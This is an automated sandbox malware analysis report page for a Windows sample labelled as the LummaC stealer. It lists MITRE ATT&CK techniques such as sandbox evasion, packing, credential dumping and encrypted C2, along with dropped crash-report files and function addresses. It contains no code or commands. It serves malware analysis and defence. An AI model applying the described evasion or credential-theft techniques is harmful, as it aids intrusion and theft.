Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VoGtelkHSn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VoGtelkHSn.exe_f761c59d348b96dd452ab7afe8f633ac68302a8_1ce72faa_daaeda3a-c187-4474-9194-c28c6a83adde\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER43F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER53A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER56A.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
VoGtelkHSn.exe

Function 0041D1C1 Relevance: 18.1, APIs: 2, Strings: 8, Instructions: 557
COMMON

Function 00423943 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 643
COMMON

Function 00424084 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 676
COMMON

Function 00424087 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 650
COMMON

Function 02EB003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0041D690 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 192
COMMON

Function 00414950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 177
COMMON

Function 00424AF5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 433
COMMON

Function 00424F8F Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 366
COMMON

Function 0041DF50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140
COMMON

Function 00431DD5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27
COMMON